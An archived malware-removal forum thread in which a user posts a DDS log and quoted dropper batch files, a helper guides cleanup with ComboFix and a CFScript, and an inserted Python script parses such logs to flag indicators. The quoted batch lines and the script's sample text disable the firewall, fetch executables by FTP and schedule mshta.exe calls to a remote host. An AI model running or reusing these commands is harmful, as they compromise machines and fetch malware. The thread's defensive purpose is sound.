
CPU 100%; Files keep recreating in c:\ root


This topic is locked
9 replies to this topic

#1 kdt2121

kdt2121

  • Members
  • 7 posts
  • OFFLINE
  •  
  • Local time:07:41 AM

Posted 19 January 2009 - 05:57 PM

Activity the last week: itunes installed; touchcopy installed; vuze bit torrent program installed.

Machine stays pretty clean, running trend micro internet suite.

Once CPU problem started two days ago, I noticed that I had a lot of strange processes running. I could kill them but they would come back. Not with the same name. Found one entry in the registry that was the name of the process under the iexplorerer UUI section. It was calling one of the processes at that time called eejevkk.exe. I noticed that it was being called from the root directory. I went to the root and found several files that are not normally there. Some were .exe, some were .bat, and some were .txt. I edited a few of them and found commands like the following:

"@echo off
at /delete /yes
at 00:00 /every:M,T,W,Th,F,S,Su mshta.exe http://egntxselsaossawilurx.cn/s_t_t.php
at 00:15 /every:M,T,W,Th,F,S,Su mshta.exe http://egntxselsaossawilurx.cn/s_t_t.php
at 00:30 /every:M,T,W,Th,F,S,Su mshta.exe http://egntxselsaossawilurx.cn/s_t_t.php
at 00:45 /every:M,T,W,Th,F,S,Su mshta.exe http://egntxselsaossawilurx.cn/s_t_t.php
at 01:00 /every:M,T,W,Th,F,S,Su mshta.exe http://egntxselsaossawilurx.cn/s_t_t.php"

Put in code tags in order to deactivate links. ~ OB

and

"qqq
12345
bin
get calc.exe c:\Scdg4OXz.exe
bye"

and

"@echo off
netsh firewall set opmode disable
ftp -s:c:\C2Iy.txt egntxselsaossawilurx.cn
start c:\FKMz4Gx.exe
start c:\FKMz4Gx.exe
start c:\FKMz4Gx.exe"

Here is what I have done:
Booted in safe mode; deleted these .exe, .bat, and .txt files; ran full scan (only found one adaware and fixed); then checked config.sys and win.ini and could not find anything; then did system restore to 4 days prior at system checkpoint.
It still showed up so I did all of this again, restoring to a point one week ago.
Still shows up after a few minutes.
Most of the .exe problems are under the system user account.
The last thing I did was delete all three instances of calc.exe from the system. I figured I could reinstall later with a good copy. This has only caused a few minor issues for the malware with error messages but it is still there no doubt.

Here is the file generated from the DDS:

DDS (Ver_09-01-18.01) - NTFSx86
Run by 4CastGo at 16:40:20.92 on Mon 01/19/2009
Internet Explorer: 7.0.5730.11
Microsoft Windows XP Professional 5.1.2600.2.1252.1.1033.18.2558.1958 [GMT -6:00]

AV: Trend Micro Internet Security *On-access scanning enabled* (Updated)
FW: Norton Internet Security *disabled*
FW: Trend Micro Personal Firewall *enabled*

============== Running Processes ===============

C:\WINDOWS\system32\svchost -k DcomLaunch
svchost.exe
C:\WINDOWS\System32\svchost.exe -k netsvcs
svchost.exe
svchost.exe
C:\WINDOWS\system32\spoolsv.exe
C:\Program Files\Trend Micro\BM\TMBMSRV.exe
C:\Program Files\Common Files\Apple\Mobile Device Support\bin\AppleMobileDeviceService.exe
C:\Program Files\Bonjour\mDNSResponder.exe
C:\WINDOWS\System32\svchost.exe -k HTTPFilter
C:\WINDOWS\system32\PSIService.exe
C:\Program Files\Trend Micro\Internet Security\SfCtlCom.exe
C:\WINDOWS\Explorer.EXE
C:\WINDOWS\System32\svchost.exe -k imgsvc
C:\Program Files\Trend Micro\Internet Security\TmPfw.exe
C:\Program Files\Trend Micro\Internet Security\UfSeAgnt.exe
C:\WINDOWS\System32\DSentry.exe
C:\Program Files\Trend Micro\Internet Security\TmProxy.exe
C:\WINDOWS\system32\dla\tfswctrl.exe
C:\WINDOWS\system32\igfxpers.exe
C:\Program Files\iTunes\iTunesHelper.exe
C:\WINDOWS\system32\ctfmon.exe
C:\Program Files\Trend Micro\Internet Security\TMAS_OE\TMAS_OEMon.exe
C:\Program Files\Windows Media Player\WMPNSCFG.exe
C:\Program Files\iPod\bin\iPodService.exe
C:\WINDOWS\system32\wscntfy.exe
C:\WINDOWS\system32\taskmgr.exe
C:\Program Files\Internet Explorer\IEXPLORE.EXE
c:\qSizbC.exe
c:\fMZjA.exe
C:\WINDOWS\system32\igfxsrvc.exe
C:\WINDOWS\system32\MDM.EXE
C:\Documents and Settings\4CastGo\Desktop\dds.scr
c:\IMTEHNqq.exe
c:\fMZjA.exe
c:\KLuDWS.exe
c:\KLuDWS.exe
c:\GeHn4.exe
c:\KLuDWS.exe
c:\KLuDWS.exe
c:\rTYzKbjc.exe
c:\Gdhk.exe
c:\fMZjA.exe

============== Pseudo HJT Report ===============

uStart Page = hxxp://www.google.com/
uInternet Connection Wizard,ShellNext = hxxp://www.dell4me.com/myway
uInternet Settings,ProxyOverride = *.local
TB: Adobe PDF: {47833539-d0c5-4125-9fa8-0819e2eaac93} - c:\program files\adobe\acrobat 7.0\acrobat\AcroIEFavClient.dll
TB: {0B53EAC3-8D69-4B9E-9B19-A37C9A5676A7} - No File
TB: {42CDD1BF-3FFB-4238-8AD1-7859DF00B1D6} - No File
TB: {EF99BD32-C1FB-11D2-892F-0090271D4F88} - No File
TB: {2318C2B1-4965-11D4-9B18-009027A5CD4F} - No File
EB: Adobe PDF: {182ec0be-5110-49c8-a062-beb1d02a220b} - c:\program files\adobe\acrobat 7.0\acrobat\AcroIEFavClient.dll
EB: {4528BBE0-4E08-11D5-AD55-00010333D0AD} - No File
EB: Real.com: {fe54fa40-d68c-11d2-98fa-00c0f0318afe} - c:\windows\system32\Shdocvw.dll
EB: {32683183-48a0-441b-a342-7c2a440a9478} - No File
uRun: [ctfmon.exe] c:\windows\system32\ctfmon.exe
uRun: [OE] c:\program files\trend micro\internet security\tmas_oe\TMAS_OEMon.exe
uRun: [DellSupport] "c:\program files\dellsupport\DSAgnt.exe" /startup
uRun: [DellTransferAgent] "c:\documents and settings\all users\application data\dell\transferagent\TransferAgent.exe"
uRun: [WMPNSCFG] c:\program files\windows media player\WMPNSCFG.exe
mRun: [DVDSentry] c:\windows\system32\DSentry.exe
mRun: [dla] c:\windows\system32\dla\tfswctrl.exe
mRun: [NvMediaCenter] RUNDLL32.EXE c:\windows\system32\NvMcTray.dll,NvTaskbarInit
mRun: [PinnacleDriverCheck] c:\windows\system32\PSDrvCheck.exe -CheckReg
mRun: [igfxtray] c:\windows\system32\igfxtray.exe
mRun: [igfxhkcmd] c:\windows\system32\hkcmd.exe
mRun: [igfxpers] c:\windows\system32\igfxpers.exe
mRun: [UfSeAgnt.exe] "c:\program files\trend micro\internet security\UfSeAgnt.exe"
mRun: [QuickTime Task] "c:\program files\quicktime\qttask.exe" -atboottime
mRun: [TkBellExe] "c:\program files\common files\real\update_ob\realsched.exe" -osboot
mRun: [iTunesHelper] "c:\program files\itunes\iTunesHelper.exe"
dRun: [OE] c:\program files\trend micro\internet security\tmas_oe\TMAS_OEMon.exe
dExplorerRun: [MsnHost] c:\CNUb0r.exe
dExplorerRun: [MsnLoad] c:\CNUb0r.exe
dExplorerRun: [MsnConvert] c:\CNUb0r.exe
dExplorerRun: [Msn] c:\CNUb0r.exe
dExplorerRun: [MsnMessendger] c:\CNUb0r.exe
StartupFolder: c:\docume~1\alluse~1\startm~1\programs\startup\adobea~1.lnk - c:\windows\installer\{ac76ba86-1033-0000-7760-000000000002}\SC_Acrobat.exe
StartupFolder: c:\docume~1\alluse~1\startm~1\programs\startup\micros~1.lnk - c:\program files\microsoft office\office10\OSA.EXE
IE: Convert link target to Adobe PDF - c:\program files\adobe\acrobat 7.0\acrobat\AcroIEFavClient.dll/AcroIECapture.html
IE: Convert link target to existing PDF - c:\program files\adobe\acrobat 7.0\acrobat\AcroIEFavClient.dll/AcroIEAppend.html
IE: Convert selected links to Adobe PDF - c:\program files\adobe\acrobat 7.0\acrobat\AcroIEFavClient.dll/AcroIECaptureSelLinks.html
IE: Convert selected links to existing PDF - c:\program files\adobe\acrobat 7.0\acrobat\AcroIEFavClient.dll/AcroIEAppendSelLinks.html
IE: Convert selection to Adobe PDF - c:\program files\adobe\acrobat 7.0\acrobat\AcroIEFavClient.dll/AcroIECapture.html
IE: Convert selection to existing PDF - c:\program files\adobe\acrobat 7.0\acrobat\AcroIEFavClient.dll/AcroIEAppend.html
IE: Convert to Adobe PDF - c:\program files\adobe\acrobat 7.0\acrobat\AcroIEFavClient.dll/AcroIECapture.html
IE: Convert to existing PDF - c:\program files\adobe\acrobat 7.0\acrobat\AcroIEFavClient.dll/AcroIEAppend.html
IE: E&xport to Microsoft Excel - c:\progra~1\micros~4\office10\EXCEL.EXE/3000
IE: {e2e2dd38-d088-4134-82b7-f2ba38496583} - %windir%\Network Diagnostic\xpnetdiag.exe
IE: {FB5F1910-F110-11d2-BB9E-00C04F795683} - c:\program files\messenger\msmsgs.exe
IE: {08B0E5C0-4FCB-11CF-AAA5-00401C608501} - {CAFEEFAC-0015-0000-0004-ABCDEFFEDCBC} - c:\program files\java\jre1.5.0_04\bin\npjpi150_04.dll
IE: {CD67F990-D8E9-11d2-98FE-00C0F0318AFE} - {FE54FA40-D68C-11d2-98FA-00C0F0318AFE} - c:\windows\system32\Shdocvw.dll
LSP: c:\program files\google\google desktop search\GoogleDesktopNetwork1.dll
Handler: cdo - {CD00020A-8B95-11D1-82DB-00C04FB1625D} - c:\program files\common files\microsoft shared\web folders\pkmcdo.dll
Notify: igfxcui - igfxdev.dll
SSODL: WPDShServiceObj - {AAA288BA-9A4C-45B0-95D7-94D524869DB5} - c:\windows\system32\WPDShServiceObj.dll
SEH: Microsoft.AntiSpyware.ShellExecuteHook.1: {9ef34ff2-3396-4527-9d27-04c8c1c67806} - c:\program files\microsoft antispyware\shellextension.dll

============= SERVICES / DRIVERS ===============

R3 o200avs;Osprey-2X0 AVStream Audio Device;c:\windows\system32\drivers\o200avs.sys [2004-8-28 114048]
R3 tmcfw;Trend Micro Common Firewall Service;c:\windows\system32\drivers\TM_CFW.sys [2008-7-30 334352]
R3 WnvCOM;WnvCOM;c:\windows\system32\drivers\WnvCOM.sys [2003-11-7 21672]
R4 tmevtmgr;tmevtmgr;c:\windows\system32\drivers\tmevtmgr.sys [2008-10-27 49680]
R4 TmPfw;Trend Micro Personal Firewall;c:\program files\trend micro\internet security\TmPfw.exe [2008-10-27 492888]
R4 tmpreflt;tmpreflt;c:\windows\system32\drivers\tmpreflt.sys [2008-7-30 36368]
R4 TmProxy;Trend Micro Proxy Service;c:\program files\trend micro\internet security\TmProxy.exe [2008-10-27 677128]
S1 Winnov32;Winnov32;c:\windows\system32\drivers\Winnov32.sys [2003-11-7 580123]
S3 WnvKAud;Winnov Kernel Audio;c:\windows\system32\drivers\WnvKAud.sys [2003-11-7 111032]
S3 WnvKVid;Winnov Kernel Video;c:\windows\system32\drivers\WnvKVid.sys [2003-11-7 303740]
S4 WinDriver;WinDriver;c:\windows\system32\drivers\windrvr.sys --> c:\windows\system32\drivers\WINDRVR.SYS [?]
S4 Wnvirq32Service;wnvirq32 Service;c:\windows\system32\wnvirq32.exe --> c:\windows\system32\wnvirq32.exe [?]

=============== Created Last 30 ================

2009-01-19 16:31 193,536 a------- C:\ym5fs8Vx.exe
2009-01-19 16:31 193,536 a------- C:\W4VPr.exe
2009-01-19 16:31 193,536 a------- C:\icXHKlJ.exe
2009-01-19 16:31 193,536 a------- C:\CNUb0r.exe
2009-01-19 16:31 193,536 a------- C:\aKc3inRs.exe
2009-01-19 16:20 193,536 a------- C:\Gdhk.exe
2009-01-19 16:20 193,536 a------- C:\SpzqN.exe
2009-01-19 16:20 193,536 a------- C:\iyqLHg8.exe
2009-01-19 16:20 193,536 a------- C:\KLuDWS.exe
2009-01-19 15:54 193,536 a------- C:\HLXKl.exe
2009-01-19 15:53 8,098 a------- C:\ma1DGtd.bat
2009-01-19 15:53 200 a------- C:\npfhBo.bat
2009-01-19 15:30 193,536 a------- C:\fMZjA.exe
2009-01-19 15:30 8,098 a------- C:\C6Vi.bat
2009-01-19 15:30 197 a------- C:\y6eM6Rg.bat
2009-01-19 15:15 193,536 a------- C:\Yg755.exe
2009-01-19 15:15 193,536 a------- C:\qUo0XH.exe
2009-01-19 15:15 193,536 a------- C:\jkI.exe
2009-01-19 15:15 8,098 a------- C:\CsHLey8.bat
2009-01-19 15:15 8,098 a------- C:\aNgpd.bat
2009-01-19 15:15 8,098 a------- C:\Skby.bat
2009-01-19 15:15 201 a------- C:\BSI6.bat
2009-01-19 15:15 200 a------- C:\t1l.bat
2009-01-19 15:15 189 a------- C:\o389rJ5m.bat
2009-01-19 15:02 193,536 a------- C:\rTYzKbjc.exe
2009-01-19 15:02 193,536 a------- C:\qnFOaY.exe
2009-01-19 15:02 193,536 a------- C:\OkB43CtV.exe
2009-01-19 15:02 193,536 a------- C:\Ngt6Vo.exe
2009-01-19 15:01 8,098 a------- C:\T7Sgy3.bat
2009-01-19 15:01 8,098 a------- C:\KhjtU4.bat
2009-01-19 15:01 214 a------- C:\sPYK0.bat
2009-01-19 15:01 8,098 a------- C:\Ux0D.bat
2009-01-19 15:01 200 a------- C:\CMCFluF.bat
2009-01-19 15:01 8,098 a------- C:\Susl.bat
2009-01-19 15:01 213 a------- C:\YDHl.bat
2009-01-19 15:01 203 a------- C:\mGnM6sQ.bat
2009-01-19 14:55 8,098 a------- C:\Upw41ud.bat
2009-01-19 14:55 8,098 a------- C:\VpnbJ.bat
2009-01-19 14:55 8,098 a------- C:\qQrfV.bat
2009-01-19 14:55 8,098 a------- C:\PhF7Of.bat
2009-01-19 14:55 195 a------- C:\iSu6jMfs.bat
2009-01-19 14:55 206 a------- C:\nROYLx0l.bat
2009-01-19 14:55 203 a------- C:\ynTl.bat
2009-01-19 14:55 197 a------- C:\m3le2.bat
2009-01-19 14:16 193,536 a------- C:\xi3glD4M.exe
2009-01-19 14:16 193,536 a------- C:\tCLvuW.exe
2009-01-19 14:16 193,536 a------- C:\IMTEHNqq.exe
2009-01-19 14:15 8,098 a------- C:\LCLi.bat
2009-01-19 14:15 213 a------- C:\yVUWRKN.bat
2009-01-19 14:15 8,098 a------- C:\iNI.bat
2009-01-19 14:15 8,098 a------- C:\bJVMK3IJ.bat
2009-01-19 14:15 212 a------- C:\cKWApvRl.bat
2009-01-19 14:15 203 a------- C:\nQFO.bat
2009-01-19 14:03 193,536 a------- C:\fLiMSaRt.exe
2009-01-19 14:03 193,536 a------- C:\d8zza.exe
2009-01-19 14:03 193,536 a------- C:\BChOh.exe
2009-01-19 14:03 193,536 a------- C:\YIr45NxT.exe
2009-01-19 14:02 8,098 a------- C:\OAr6EjIN.bat
2009-01-19 14:02 8,098 a------- C:\PiXzi.bat
2009-01-19 14:02 215 a------- C:\adJ6BsG.bat
2009-01-19 14:02 195 a------- C:\zni.bat
2009-01-19 14:02 8,098 a------- C:\Jb38D.bat
2009-01-19 14:02 198 a------- C:\lEIQ.bat
2009-01-19 14:02 8,098 a------- C:\cMWkphQ.bat
2009-01-19 14:02 212 a------- C:\CIra.bat
2009-01-19 13:30 193,536 a------- C:\vvc.exe
2009-01-19 13:30 193,536 a------- C:\GeHn4.exe
2009-01-19 13:30 8,098 a------- C:\mb7D.bat
2009-01-19 13:30 8,098 a------- C:\AoRwvS6j.bat
2009-01-19 13:30 200 a------- C:\UwV.bat
2009-01-19 13:30 186 a------- C:\MTKwL.bat
2009-01-19 13:15 193,536 a------- C:\J2bIwOYn.exe
2009-01-19 13:15 193,536 a------- C:\qSizbC.exe
2009-01-19 13:15 8,098 a------- C:\qX5NHn.bat
2009-01-19 13:15 8,098 a------- C:\OMxcmSAC.bat
2009-01-19 13:15 213 a------- C:\PkQB.bat
2009-01-19 13:15 202 a------- C:\SeHgQjsQ.bat
2009-01-19 13:00 193,536 a------- C:\Scdg4OXz.exe
2009-01-19 13:00 193,536 a------- C:\FKMz4Gx.exe
2009-01-19 13:00 8,098 a------- C:\v2ImlOBm.bat
2009-01-19 13:00 213 a------- C:\IXm.bat
2009-01-19 13:00 8,098 a------- C:\MxdI7.bat
2009-01-19 13:00 206 a------- C:\PyYwn7.bat
2009-01-11 16:07 <DIR> --d----- c:\docume~1\alluse~1\applic~1\Azureus
2009-01-11 16:07 <DIR> --d----- c:\docume~1\4castgo\applic~1\Azureus
2009-01-11 16:06 <DIR> --d----- c:\program files\Vuze(2)
2009-01-11 13:13 664 a------- c:\windows\system32\d3d9caps.dat
2009-01-11 10:36 <DIR> --d----- C:\pdf995
2009-01-10 08:31 <DIR> --d----- c:\program files\Wide Angle Software
2009-01-09 19:43 107,368 a------- c:\windows\system32\GEARAspi.dll
2009-01-09 19:43 15,464 a------- c:\windows\system32\drivers\GEARAspiWDM.sys
2009-01-09 19:42 <DIR> --d----- c:\program files\iPod
2009-01-09 19:42 <DIR> --d----- c:\docume~1\alluse~1\applic~1\{3276BE95_AF08_429F_A64F_CA64CB79BCF6}
2009-01-09 19:41 <DIR> --d----- c:\program files\Bonjour
2009-01-09 19:38 32,000 a------- c:\windows\system32\drivers\usbaapl.sys
2009-01-08 15:58 54,156 a---h--- c:\windows\QTFont.qfn
2009-01-08 15:58 1,409 a------- c:\windows\QTFont.for
2009-01-08 12:48 <DIR> --d----- c:\program files\MSECache
2009-01-08 12:35 4 a------- c:\windows\system32\45B606

==================== Find3M ====================

2009-01-19 16:30 8,098 a------- C:\AliYR070.bat
2009-01-19 16:30 8,098 a------- C:\jEEhk0.bat
2009-01-19 16:30 8,098 a------- C:\A0QUuJU2.bat
2009-01-19 16:30 8,098 a------- C:\JTP0q.bat
2009-01-19 16:30 8,098 a------- C:\Fi1.bat
2009-01-19 16:30 213 a------- C:\QYpF.bat
2009-01-19 16:30 210 a------- C:\wKtIFAPo.bat
2009-01-19 16:30 208 a------- C:\iE42W.bat
2009-01-19 16:30 201 a------- C:\CtVliWMn.bat
2009-01-19 16:30 196 a------- C:\DTJJ.bat
2009-01-11 10:46 3,662 a--sh--- c:\windows\system32\KGyGaAvL.sys
2008-11-26 19:42 205,328 a------- c:\windows\system32\drivers\tmxpflt.sys
2008-11-26 19:42 36,368 a------- c:\windows\system32\drivers\tmpreflt.sys
2008-11-26 19:39 1,195,384 a------- c:\windows\system32\drivers\vsapint.sys
2008-10-26 17:48 2,300 a------- c:\windows\system32\tmp.reg
2008-10-25 19:52 2,760 a------- c:\windows\system32\TDSSlxcp.dll
2008-10-25 12:33 26,112 a------- c:\windows\system32\TDSSoiqh.dll
2007-03-21 08:43 56,912 a------- c:\documents and settings\4castgo\g2mdlhlpx.exe
2007-02-26 15:58 168,000 ac------ c:\docume~1\4castgo\applic~1\GDIPFONTCACHEV1.DAT
2006-12-07 07:44 563,712 a------- c:\documents and settings\4castgo\gotomypc_370.exe
2003-07-25 11:38 132,096 a------- c:\program files\common files\PCSBoff.exe
2007-01-24 17:38 168 ---shr-- c:\windows\system32\E110B07331.sys
2004-09-12 20:26 15,360 a--shr-- c:\windows\system32\shdocpe.dll

============= FINISH: 16:42:30.87 ===============


Edited by Orange Blossom, 19 January 2009 - 10:19 PM.
Deactivate links. ~ OB



#2 Thunder

Thunder

  • Members
  • 3,294 posts
  • OFFLINE
  •  
  • Gender:Male
  • Location:Belgium
  • Local time:03:41 PM

Posted 29 January 2009 - 05:16 PM

Hello Kdt2121 and welcome to Bleeping Computer,

You've got a real mess there. :thumbup2:
Let's see if we can clean this up :

Please read this tutorial carefully to download ComboFix from one of the locations specified, and save it to your Desktop.
Double click the ComboFix icon to run it.
If ComboFix asks you to install the Recovery Console, please do so.
The Windows Recovery Console will allow you to boot up into a special recovery mode, in case your computer has a problem after an attempted removal of malware. This allows us to help you.
Once the Recovery Console is installed, continue with the malware scan.

Note: Make sure not to click ComboFix's window while it's running. That may cause it to stall or freeze.

Please post the log from ComboFix (can also be found as C:\ComboFix.txt) in your next reply. :)

If you have any questions along the way, STOP and ask them before proceeding !!

Greetings,
Thunder
Whatever happens, make believe it was intended to ...
-----------------------------------------------------------------------
Posted Image - If I have helped you in any way, please consider a donation to help me continue the fight against malware.
-----------------------------------------------------------------------
Stand Up & Be Counted --> Posted Image <-- And make a difference

#3 kdt2121

kdt2121
  • Topic Starter

  • Members
  • 7 posts
  • OFFLINE
  •  
  • Local time:07:41 AM

Posted 29 January 2009 - 10:46 PM

Hi,
Ran the Combo fix. Attached is the report.
F.Y.I. lately I have seen dwwin.exe in the processes. Like 20 of them and once Dr. Watson popped up on the screen. I have never loaded this to my knowledge.
thanks,
Kevin

Attached File  ComboFix.txt   36.92KB   9 downloads

#4 Thunder

Thunder

  • Members
  • 3,294 posts
  • OFFLINE
  •  
  • Gender:Male
  • Location:Belgium
  • Local time:03:41 PM

Posted 30 January 2009 - 07:43 AM

Hello Kevin,

Let's clean up some more :

Open Notepad - don't use any other text editor than Notepad or the script will fail!
Copy/paste the bold, blue text below into an empty notepad window:

File::
C:\vfi.exe
C:\uiGfxhGP.exe
C:\rYI2.exe
C:\OVhQd.exe
C:\JBu.exe
C:\f1wLgMC.exe
C:\bor92Xd1.exe
C:\mIJk.exe
C:\EB9f.exe
C:\qDtr.bat
C:\nEAJViWt.bat
C:\C2nBui.bat
C:\lUOhR.bat
C:\L3X.bat
C:\Lb6dB.bat
C:\NiykmzP.exe
C:\apS.bat
C:\rnHiCqj.bat
C:\ZCmvbz.bat
C:\RQOV14G.bat
C:\wOHB.exe
C:\dnc.bat
C:\bFHP.bat
C:\pi9.bat
C:\rQJCrfv.bat
C:\toTa.bat
C:\ovv.bat
C:\ey2.bat
C:\MHmUS.bat
C:\wuQ3kI9p.bat
C:\QukF9RiZ.bat
C:\iXLzCw.bat
C:\KBuL.bat
C:\ZEciRi.exe
C:\kDXIJj.exe
C:\SrF.bat
C:\JKf.bat
C:\OFTXNtn.exe
C:\eSbui.bat
C:\kU7ED.bat
C:\LtyGv.exe
C:\iVhpo.bat
C:\lJ6gSvWU.bat
C:\hykVBD.exe
C:\KUMq93.bat
C:\zbhL.bat
C:\wClCJYJp.exe
C:\iK5Esk.bat
C:\e5fg.bat
C:\v0jo0UWJ.exe
C:\CBjZGrY.bat
C:\CKWB2nO8.bat
C:\KsPoj.exe
C:\mRe.bat
C:\LMos4y.bat
C:\tDFTn1cx.exe
C:\Rjp.bat
C:\ELs.bat
C:\OeSlVJo8.exe
C:\exOaRt.bat
C:\CzBqMVPH.bat
C:\XpO0.exe
C:\pSkEC7G.bat
C:\DGHiZ.bat
C:\dCOhVsPu.exe
C:\q0a5OR.bat
C:\WQhlh.bat
C:\T7yxR.exe
C:\uDB.bat
C:\O5D.bat
C:\ARJkcY.exe
C:\R0p.bat
C:\IvbzRnZM.bat
C:\cPo6p.exe
C:\hp1.bat
C:\CyU.bat
C:\VJroE.bat
C:\WbVxtta.bat
C:\EDT.exe
C:\BJKBeKl.bat
C:\Y5PGKZ.bat
C:\JDH1.exe
C:\Dbtst.bat
C:\P6cs1.bat
C:\njI.exe
C:\WfowJe.bat
C:\c61593Z.bat
C:\gry48.exe
C:\hMGOb.bat
C:\Upl9EV.bat
C:\XpNUYnl.exe
C:\qRCes.bat
C:\HEmy.bat
C:\cFNGIPE.exe
C:\DCXU4v.bat
C:\ERIG0zM.bat
C:\vlL.exe
C:\a2us.bat
C:\KPAYl.bat
C:\s15.exe
C:\o1KzEkgp.bat
C:\LTV.bat
C:\wZ8zHNKJ.exe
C:\T4e.bat
C:\A0i.bat
C:\VJjXRKE4.exe
C:\UlHi.exe
C:\nFjILPg.exe
C:\YHP.exe
C:\ym5fs8Vx.exe
C:\W4VPr.exe
C:\icXHKlJ.exe
C:\CNUb0r.exe
C:\aKc3inRs.exe
C:\JTP0q.bat
C:\jEEhk0.bat
C:\Fi1.bat
C:\AliYR070.bat
C:\A0QUuJU2.bat
C:\QYpF.bat
C:\wKtIFAPo.bat
C:\iE42W.bat
C:\CtVliWMn.bat
C:\DTJJ.bat
C:\YgDNH2.bat
C:\ulT5ign1.bat
C:\VO8xX4.bat
C:\mAJy8E.bat
C:\zmilPb8g.bat
C:\zI0qFTh.bat
c:\documents and settings\default\Application Data\tvmcwrd.dll
c:\documents and settings\default\Application Data\tvmknwrd.dll
c:\windows\SYSTEM32\E110B07331.sys
c:\unoQBHkg.exe
Registry::
[HKEY_USERS\.DEFAULT\software\microsoft\windows\Currentversion\policies\explorer\Run]
"MsnHost"=-
"MsnLoad"=-
"MsnConvert"=-
"Msn"=-

Save this as a text file named CFScript.

Then drag the CFScript into ComboFix.exe as you see in the screenshot below.

[screenshot not reproduced]

This will start ComboFix again. Upon reboot, (in case it asks to reboot), post the contents of the Combofix log in your next reply, as well as a fresh DDS log.

Still having problems ?

Greetings,
Thunder
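Added example (not from this thread, and not code from DDS or ComboFix): a Python triage script that pulls the pattern kdt2121 reported out of DDS-style log lines (randomly named files directly in the C:\ root with a few repeating sizes, .DEFAULT-hive ExplorerRun entries pointing at them, dropper batch files that disable the firewall, fetch over FTP and schedule mshta.exe) and renders the File::/Registry:: CFScript layout Thunder used. The sample log and batch lines are constructed in the shape of the log above; the hostname dropper.invalid is a placeholder.

```python
"""Triage helper for the pattern in this thread: random-named .exe/.bat files in
the C:\\ root, policies\\explorer\\Run values in the .DEFAULT hive pointing at
them, and dropper batch files. Added example, not DDS or ComboFix code."""
import re
from collections import Counter

# DDS "Created Last 30" / "Find3M" line: date time size attrs path
DDS_FILE_RE = re.compile(
    r"^(?P<date>\d{4}-\d{2}-\d{2}) (?P<time>\d{2}:\d{2}) "
    r"(?P<size>[\d,]+|<DIR>) (?P<attrs>\S+) (?P<path>.+)$")
# DDS pseudo-HJT autostart line, e.g. "dExplorerRun: [MsnHost] c:\CNUb0r.exe"
HJT_RUN_RE = re.compile(
    r"^(?P<hive>[umd])(?P<key>ExplorerRun|Run): \[(?P<name>[^\]]+)\] (?P<target>.+)$")
# A file sitting directly under the drive root, with no subdirectory
ROOT_DROP_RE = re.compile(r"^[a-z]:\\[^\\]+\.(exe|bat|txt)$", re.IGNORECASE)

# Commands seen in the dropper batch files quoted in the thread. URLs are
# matched in live (http) and defanged (hxxp) form, as forum posts neutralise them.
BAT_INDICATORS = {
    "firewall_disabled": re.compile(r"netsh\s+firewall\s+set\s+opmode\s+disable", re.I),
    "scheduled_mshta": re.compile(
        r"^\s*at\s+\d{2}:\d{2}\s+/every:\S+\s+mshta\.exe\s+h(?:tt|xx)ps?://", re.I | re.M),
    "ftp_script_download": re.compile(r"^\s*ftp\s+-s:", re.I | re.M),
}


def parse_dds_files(lines):
    """Parse DDS file-listing lines into dicts; lines of other shapes are skipped."""
    entries = []
    for line in lines:
        m = DDS_FILE_RE.match(line.strip())
        if not m:
            continue
        size = None if m["size"] == "<DIR>" else int(m["size"].replace(",", ""))
        entries.append({"date": m["date"], "time": m["time"], "size": size,
                        "attrs": m["attrs"], "path": m["path"]})
    return entries


def flag_root_drops(entries):
    """Return (root-level file paths, histogram of their sizes). A burst of
    root-level files sharing one or two exact sizes is the re-dropping seen here."""
    drops = [e for e in entries
             if e["size"] is not None and ROOT_DROP_RE.match(e["path"])]
    return [e["path"] for e in drops], Counter(e["size"] for e in drops)


def flag_autostarts(lines):
    """Flag Run/ExplorerRun autostarts whose target is a root-level file. Hive 'd'
    is HKEY_USERS\\.DEFAULT, which is why the processes ran under SYSTEM."""
    hits = []
    for line in lines:
        m = HJT_RUN_RE.match(line.strip())
        if m and ROOT_DROP_RE.match(m["target"]):
            hits.append((m["hive"], m["name"], m["target"]))
    return hits


def classify_bat(text):
    """Return the set of dropper indicators present in a batch file's text."""
    return {name for name, rx in BAT_INDICATORS.items() if rx.search(text)}


def build_cfscript(paths, run_values):
    """Render a ComboFix CFScript in the File::/Registry:: layout used in the
    thread; a '"name"=-' line deletes that value under the preceding key."""
    out = ["File::", *paths, "Registry::"]
    for key, names in run_values.items():
        out.append(f"[{key}]")
        out.extend(f'"{n}"=-' for n in names)
    return "\n".join(out) + "\n"


# Constructed sample input in the shape of the DDS log posted in this thread
SAMPLE_DDS = """
2009-01-19 16:31 193,536 a------- C:\\ym5fs8Vx.exe
2009-01-19 16:31 193,536 a------- C:\\CNUb0r.exe
2009-01-19 15:53 8,098 a------- C:\\ma1DGtd.bat
2009-01-19 15:53 200 a------- C:\\npfhBo.bat
2009-01-09 19:43 107,368 a------- c:\\windows\\system32\\GEARAspi.dll
2009-01-11 16:06 <DIR> --d----- c:\\program files\\Vuze(2)
dExplorerRun: [MsnHost] c:\\CNUb0r.exe
mRun: [iTunesHelper] "c:\\program files\\itunes\\iTunesHelper.exe"
""".strip().splitlines()

# Constructed dropper batch text; the hostname is a placeholder, not the real one
SAMPLE_BAT = """@echo off
netsh firewall set opmode disable
ftp -s:c:\\C2Iy.txt dropper.invalid
start c:\\FKMz4Gx.exe
at 00:15 /every:M,T,W,Th,F,S,Su mshta.exe hxxp://dropper.invalid/s_t_t.php
"""
RUN_KEY = r"HKEY_USERS\.DEFAULT\software\microsoft\windows\Currentversion\policies\explorer\Run"

if __name__ == "__main__":
    paths, sizes = flag_root_drops(parse_dds_files(SAMPLE_DDS))
    print(paths, dict(sizes), flag_autostarts(SAMPLE_DDS), sorted(classify_bat(SAMPLE_BAT)))
    print(build_cfscript(paths, {RUN_KEY: [n for _, n, _ in flag_autostarts(SAMPLE_DDS)]}))
```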

#5 kdt2121

kdt2121
  • Topic Starter

  • Members
  • 7 posts
  • OFFLINE
  •  
  • Local time:07:41 AM

Posted 30 January 2009 - 08:32 AM

Files are still in root. Logs attached.

Kevin


#6 Thunder

Thunder

  • Members
  • 3,294 posts
  • OFFLINE
  •  
  • Gender:Male
  • Location:Belgium
  • Local time:03:41 PM

Posted 30 January 2009 - 11:35 AM

Hello Kdt2121,

When you look at the date, you'll see most of them are files that were present before, but couldn't be logged anymore because of the amount of files.

Can you remove them manually, using Windows Explorer,
reboot and run ComboFix again (without any script).
Let's see if they will return in such large numbers now.

Greetings,
Thunder

#7 kdt2121

kdt2121
  • Topic Starter

  • Members
  • 7 posts
  • OFFLINE
  •  
  • Local time:07:41 AM

Posted 30 January 2009 - 07:42 PM

I deleted all the files from the root.

